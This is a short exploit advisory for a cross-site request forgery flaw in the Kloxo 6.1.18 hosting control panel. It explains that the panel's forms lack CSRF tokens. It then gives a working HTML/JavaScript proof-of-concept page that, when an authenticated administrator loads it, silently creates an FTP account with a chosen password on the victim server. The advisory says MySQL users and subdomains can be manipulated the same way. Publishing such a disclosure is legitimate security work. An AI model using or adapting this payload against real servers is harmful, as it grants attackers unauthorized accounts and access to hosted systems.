# Exploit Title :Kloxo 6.1.18 Stable CSRF Vulnerability
# Vendor Homepage :http://lxcenter.org/software/kloxo
# Version :6.1.18
# Exploit Author :Necmettin COSKUN =>@babayarisi
# Blog :http://www.ncoskun.com http://www.grisapka.org
# Discovery date :03/12/2014
# CVE :N/A
Kloxo (formerly known as Lxadmin) is a free, opensource web hosting control panel for the Red Hat and CentOS Linux distributions.
================
CSRF Vulnerability
Vulnerability
================
Kloxo has lots of POST and GET based form applications some inputs escaped from specialchars but inputs dont have any csrf protection or secret key
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.
Poc Exploit
================
<html>
<head><title>Kloxo demo</title></head>
<script type="text/javascript">
function yurudi(){
///////////////////////////////////////////////////////////
//Kloxo 6.1.18 Stable CSRF Vulnerability //
//Author:Necmettin COSKUN => twitter.com/@babayarisi //
//Blog: http://www.ncoskun.com | http://www.grisapka.org //
///////////////////////////////////////////////////////////
//Remote host
var host="victim.com";
//New Ftp Username
var username="demouser";
//New Ftp Password
var pass="12345678";
//This creates new folder under admin dir. /admin/yourfolder
var dir="demodirectory";
//If necessary only modify http to https ;)
var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
document.getElementById('demoexploit').src=urlson;
}
</script>
<body onload="yurudi();">
<img id="demoexploit" src=""></img>
</body>
</html>
Discovered by:
================